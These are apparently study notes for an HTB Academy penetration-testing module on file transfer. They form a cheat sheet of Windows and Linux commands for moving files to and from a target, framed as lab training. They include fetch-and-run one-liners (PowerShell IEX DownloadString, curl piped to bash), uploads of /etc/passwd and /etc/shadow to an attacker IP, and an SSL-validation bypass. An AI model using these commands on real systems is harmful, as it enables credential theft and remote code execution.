File Transfer Notes
Notes for the 'File Transfer' module from HTB Academy
File Transfer Notes
🪟 Windows
📥 Downloading to Target
1. Base64 Encoding
- Encode on your machine, paste and decode on target.
2. PowerShell Methods (Net.WebClient)
DownloadFile:(New-Object Net.WebClient).DownloadFile('URL','output')DownloadFileAsync:(New-Object Net.WebClient).DownloadFileAsync('URL','output')DownloadString:IEX (New-Object Net.WebClient).DownloadString('url')Invoke-WebRequest:Invoke-WebRequest [url] -OutFile [file]- Use
-UseBasicParsingif needed. - Bypass SSL errors:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
3. SMB
- Sender:
1
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
- Receiver:
1 2
net use n: \\IP\share /user:test test copy n:\nc.exe
4. FTP
- Sender:
1 2
sudo pip3 install pyftpdlib sudo python3 -m pyftpdlib --port 21
- Receiver:
1
(New-Object Net.WebClient).DownloadFile('ftp://IP/file.txt','C:\path\file.txt')
- Command file method: Create a script file with FTP commands, then run:
1
ftp -v -n -s:ftpcommand.txt
📤 Uploading from Target
1. Base64 Encoding
Encode, transfer, decode.
2. PowerShell Web Upload (Invoke-RestMethod)
- Receiver:
1
python3 -m uploadserver - Sender:
1 2
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') Invoke-FileUpload -Uri http://IP:PORT/upload -File <file>
3. SMB via WebDav
- Receiver:
1 2
sudo pip3 install wsgidav cheroot sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
- Sender:
1
copy C:\path\file.zip \\IP\DavWWWRoot\
4. FTP Upload
1
(New-Object Net.WebClient).UploadFile('ftp://IP/file','C:\path\file')
🐧 Linux
📥 Downloading to Victim
1. Base64
1
cat id_rsa | base64 -w 0
2. Web Downloads
- Curl:
curl [url] -o [file] - Wget:
wget [url] -O [file] - Fileless:
curl [url] | bash
3. Bash Socket
1
2
3
exec 3<>/dev/tcp/IP/80
echo -e "GET /LinEnum.sh HTTP/1.1\n\n" >&3
cat <&3
4. SSH
- Sender:
1 2
sudo systemctl enable ssh sudo systemctl start ssh
- Receiver:
1
scp user@IP:/path/to/file .
📤 Uploading from Victim
1. Web Upload
- Receiver:
1
python3 -m uploadserver 443 --server-certificate server.pem
- Victim:
1
curl -X POST https://IP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
2. Alternate Uploads
- Web servers:
1 2 3
python3 -m http.server php -S 0.0.0.0:8000 ruby -run -ehttpd . -p8000
- Download:
1
wget http://IP:8000/file.txt
3. SCP
1
scp /etc/passwd user@IP:/path/
💻 Transfer via Code
Python
1
2
python2 -c 'import urllib;urllib.urlretrieve ("URL","file")'
python3 -c 'import urllib.request;urllib.request.urlretrieve("URL","file")'
PHP
1
php -r '$f=file_get_contents("URL");file_put_contents("file",$f);'
Ruby
1
ruby -e 'require "net/http"; File.write("file", Net::HTTP.get(URI.parse("URL")))'
Perl
1
perl -e 'use LWP::Simple; getstore("URL", "file");'
JavaScript Create wget.js with WinHttp code, then:
1
cscript.exe /nologo wget.js URL filename
VBScript Create wget.vbs, then:
1
cscript.exe /nologo wget.vbs URL filename
🐍 Upload with Python
- Receiver:
1
python3 -m uploadserver - Sender:
1
python3 -c 'import requests;requests.post("http://IP:8000/upload",files={"files":open("/etc/passwd","rb")})'
⚙️ Miscellaneous Methods
🛜 Netcat/Ncat:
- Can be used to transfer files via TCP sockets, but avoid if encrypted channels are required.
🖥️ Rdesktop:
- Useful for downloading/uploading files when RDP is enabled. Use drag-and-drop or clipboard transfer if possible.
🔐 Encrypted Transfer
1
2
3
4
5
# Encrypt
openssl enc -aes256 -in file.txt -out file.enc
# Decrypt
openssl enc -aes256 -d -in file.enc -out file.txt
🧱 Living Off The Land (LOTL)
🧰 LOLBAS (Living Off The Land Binaries and Scripts)
- Binaries already present in Windows that can be abused by attackers.
- Examples:
certutil,mshta,regsvr32,powershell,wmic
🔗 https://lolbas-project.github.io/
🔨 GTFOBins
- Linux equivalent of LOLBAS.
- Collection of binaries that can be exploited for privilege escalation, file access, execution, etc.
This post is licensed under CC BY 4.0 by the author.